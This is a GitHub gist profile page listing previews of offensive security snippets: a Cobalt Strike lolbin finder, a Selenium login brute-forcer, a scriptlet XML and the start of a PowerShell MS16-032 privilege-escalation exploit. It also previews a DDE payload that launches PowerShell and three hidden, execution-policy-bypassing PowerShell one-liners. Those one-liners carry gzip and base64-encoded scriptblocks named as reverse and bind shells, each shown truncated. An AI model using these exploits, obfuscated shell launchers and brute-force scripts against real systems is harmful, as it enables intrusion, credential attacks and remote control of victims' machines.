Skip to content

Instantly share code, notes, and snippets.

View frknozr's full-sized avatar

frknozr

66 followers · 34 following
View GitHub Profile
@frknozr
frknozr / nessus_parser.py
Created November 26, 2018 11:19
import requests
import json
from docx import Document
A_KEY = ""
S_KEY = ""
headers = {"X-ApiKeys": "accessKey=; secretKey="}
BASE_URL = "https://localhost:8834"
@frknozr
frknozr / lolbin.cna
Created November 12, 2018 19:24
Lolbin Finder Aggressor
@lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Cmstp.exe","Diskshadow.exe","Dnscmd.exe","Extexport.exe","Forfiles.exe","Gpscript.exe","Hh.exe","Ie4unit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Regasm.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Wab.exe","Wmic.exe","Xwizard.exe");
beacon_command_register("lolbin", "Queries the System for all major lolbin products installed",
"Syntax: lolbin\n" .
"Checks for installed lolbin products");
alias lolbin {
$bid = $1;
$function = $2;
@frknozr
frknozr / brute.py
Last active May 28, 2018 12:29
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from time import sleep
options = Options()
#options.add_argument("--headless")
driver = webdriver.Chrome(chrome_options=options,executable_path="chromedriver")
user_pass = "" # space seperated
@frknozr
frknozr / test.xml
Created May 21, 2018 14:04
<?XML version="1.0"?>
<scriptlet>
<registration remotable="True" version="1.0" desription="desription">
<script language="VBScript">
<![CDATA[
Msgbox("Message")
]]>
@frknozr
frknozr / test
Created March 15, 2018 09:04
vjTNELvUZXQAAAAAAAAClyVJtWzyZP1GJDNuHYs_9-MS182GzoVSkvYFYmH2-lOI
@frknozr
frknozr / privshell.ps1
Last active March 9, 2018 07:17
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
Targets:
@frknozr
frknozr / dde
Created March 8, 2018 11:59
{SET C "{QUOTE 67 58 92 92 80 114 111 103 114 97 109 115 92 92 77 105 99 114 111 115 111 102 116 92 92 79 102 102 105 99 101 92 92 77 83 87 111 114 100 46 101 120 101 92 92 46 46 92 92 46 46 92 92 46 46 92 92 46 46 92 92 119 105 110 100 111 119 115 92 92 115 121 115 116 101 109 51 50 92 92 119 105 110 100 111 119 115 112 111 119 101 114 115 104 101 108 108 92 92 118 49 46 48 92 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101} "}
{DDE {REF C} "a"}
@frknozr
frknozr / revremote.ps1
Created January 19, 2018 08:54
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIANOxYVoCA51W227bOBB991cMvNpaQixCcdvdIECKdZW0DZC2RuVtHgwDoaVxrI1MuiTlCxL/e0mJsuQ4QZvViy1yeObMmQv1Bwz4CsU0Z+DDtUiVQgaTDbzXP8NcMBTwCs7pEuETFcmm1dKWsUo5g4+o/GucxFmKTEHrvgX6cVYxnMEXXPlfJ/9hrMAfbhb4hc5RLyqi7cPCvjIm/0o8xynNMxUKTPROSjOpIRwlctxZDQRfb8gjC73eWKlsW9ua4qIKrXUPxf6ACjp3y/+jSImU3Y6dkM/nlCXd/dVIZjFnjxbP+YplnCbFqmcxBY9RSrACzHmSZ2gI/uN6UJqkU3ArN+DjD2hPUpa0vWKzPFeczVKp5deSn2mXG/1/ToxqEY/vUEkyjBdX1mJ8EpwEhweJVFQo49d6LnZtis4adv04xoXSgGU63JLK9jm6ApcoJB4y3kE3Uv4U83BgHbVfvyG9N6/J8d9vyclf7a6JwzpvlQJKJZDODdsSnOhCi4o1zbLmV+anpGdqpW3T0SAnZRZVYM/wwzjXNb8hUWXqWv9dZ6qLCrvuvTPU6FvwqYTR3plvOOcKQxQqnaYxVfidZmlCTeWFNMsmNL4be94TdEg/VzNTtuZQXz6tjNdIYC1JHVJTs9Fko3A0Hjvm15ReQEgv0M/Dn/fB1sqKLKm23ZHCtSLIYp6Yuj497Ufh5aVnpH5vbNz2tS5QvpLldIhmmGUgcsa0NWghcqmLtA1H4CBbnpo3Zlr8SK/pnOw2Yj5f5KrevGEhX2xEejtT4IYe9ILjt/A5jQWXfKog5GLBRSEggb7xaCwlCNQOl
@frknozr
frknozr / gist:31b97476330242cac87d4afea833b62e
Created January 19, 2018 08:51
revlocal.ps1
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAKqwYVoCA51WXW/bNhR996+48LRaQixCMbohDZBirpJuAbLWqLzlwTAQWrqOtcikRlL+QOL/XlKiLDlO0GV6sUVennvuuR/UTzDiaxTzgoEPtyJVChnMtvBJ/4wLwVDAO7ikK4Q/qEi2nY62jFXKGfyOyr/FWZylyBR0HjugH2cdwwV8wbX/dfYPxgr88TbHL3SJelERbR+W9rUx+UviJc5pkalQYKJ3UppJDeEoUeDeaiT4ZkueWej11kpt29k1FPM6tM4jlPsjKujSrf5PIiVSdj91Qr5cUpb0D1cjmcWcPVu85GuWcZqUq57FFDxGKcEKsORJkaEh+JvrQWWSzsGt3YCP/0J3lrKk65Wb1bnybJZKLb+W/EK73Or/S2JUi3j8gEqScZzfWIvpWXAWHB8kUlGhjF/rudy1Kbpo2Q3jGHOlAat0uBWV3Wt0Ba5QSDxmvIdupfwl5uHIOuqefhiQ01/PyAcyeD/o9k0c1nmnElAqgXRp2FbgRBdaVK5plg2/Kj8VPVMrXZuOFjkps6gGe4UfxoWu+S2JalPX+u87c11U2HcfnbFG34FPJUwOznzDJVcYolDpPI2pwr9plibUVF5Is2xG44ep571AhwwLtTBlaw4N5cvKeK0ENpI0IbU1m8y2CifTqWN+TekFhAwC/Tz9/BjsrKzIknrbnSjcKIIs5omp6/PzYRReX3tG6k/Gxu3e6gLla1lNh2iBWQaiYExbgxaikLpIu3ACDrLVuXljpsVP9JrOyX4j5su8UM3mHQt5vhXp/UKBG3owCE5/gT/TWHDJ5wpCLnIuSgEJDI1HYylBoHaww
@frknozr
frknozr / bind.ps1
Created January 19, 2018 08:40
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIyuYVoCA51WW2/bNhR+96848LRaQixCDTCgCJBiqZJuAbLWqNzmwTAQmjqOtcikR1K+IPF/HylRF8cJukwvtsjD73znOxfqFxiJDcp5wSGEW5lpjRxmO/hkfsaF5CjhHVzSNcKfVKa7Xs9YMp0JDn+gDm9xxvIMuYbeYw/M420YnMMX3IRfZ38j0xCOdyv8QpdoFjUx9nFpXxuT7wovcU6LXMcSU7OT0VwZCE/LAhurkRTbHXlmYdY7K7Vtb99SXNWh9R6h3B9RSZd+9X+SaJnx+6kXi+WS8nR4uJqonAn+bPFSbHguaFquBg5TCoZKgRNgKdIiR0vwdz+AyiSbg1+7gRD/gf4s42k/KDerc+XZPFNGfiP5uXG5M/+XxKqWCPaAWpExW904i+mH6EN0fJAoTaW2fp3nctel6Lxjd8EYrrQBrNLhV1T2r9GVuEap8JhxA91J+UvM45Fz1O8PLXXnr1dpprREurQEKzxiaisp1wyxllKVkoqRLY++y0CHj1J5UoO9QglZYcp8R5La1Hf+h97c1BEO/UdvbND3EFIFk4Mz33ApNMYodTbPGNX4g+ZZSm2xxTTPZ5Q9TIPgBTrkotALW6n20IVqxAg6aWpVaKPoyjSZ7TROplPP/toCiwg5jczz9OtjtHdKIk/rbX+icasJciZSW71nZxdJfH0dWHU/WRu/f2vKUGxUNQOSBeY5yIJzYw0m9kKZUuzDCXjI12f2jdtGPjFrJg3NBhPLVaHbzTsei9VOZvcLDX4cwGn0/jf4K2NSKDHXEAu5ErLUjMCF9WgtFUg0DtaYkjt+x12lOU2IHUzot